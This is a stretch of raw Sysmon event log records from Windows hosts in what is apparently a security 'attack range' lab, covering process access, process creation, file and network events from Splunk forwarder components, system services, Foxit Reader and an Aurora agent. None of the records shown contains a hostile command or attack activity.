12:22:33.958{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042173Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:33.958{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E489-63C7-2F06-00000000AF02}3916C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000042172Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:33.958{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E489-63C7-2F06-00000000AF02}3916C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000042171Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:33.832{FE4C2B44-E489-63C7-2F06-00000000AF02}3916C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000042170Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:33.909{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BE1C3E5F7D3493083380A0F0E453C6D,SHA256=EBDA7189BF59ECC0443F4169A52E9A57F9F87B776D0CF2258E0141812A3F437C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000016668Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:33.199{E5A8D418-E488-63C7-0802-00000000B002}660356C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042169Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:33.311{FE4C2B44-E488-63C7-2E06-00000000AF02}64443572C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042168Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:33.128{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E488-63C7-2E06-00000000AF02}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042167Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:33.126{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042166Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:33.126{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042165Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:33.126{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042164Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:33.125{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042163Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:33.125{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E488-63C7-2E06-00000000AF02}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000042162Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:33.125{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E488-63C7-2E06-00000000AF02}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000042161Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:32.990{FE4C2B44-E488-63C7-2E06-00000000AF02}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000042210Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.973{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=E317AB55689B5AC12BB3D2396D278990,SHA256=B3C7821F12A82F0EAE045A72E8EE43AC2C6273E89089F4804E5B677A19F32C6B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000016686Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:32.072{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50103-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 10341000x800000000000000016685Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:34.569{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E48A-63C7-0902-00000000B002}2988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000016684Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:34.569{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E48A-63C7-0902-00000000B002}2988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000016683Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:34.569{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E48A-63C7-0902-00000000B002}2988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000016682Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:34.371{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E48A-63C7-0902-00000000B002}2988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016681Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:34.371{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016680Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:34.371{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016679Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:34.371{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016678Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:34.371{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016677Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:34.371{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016676Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:34.371{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016675Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:34.371{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016674Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:34.371{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 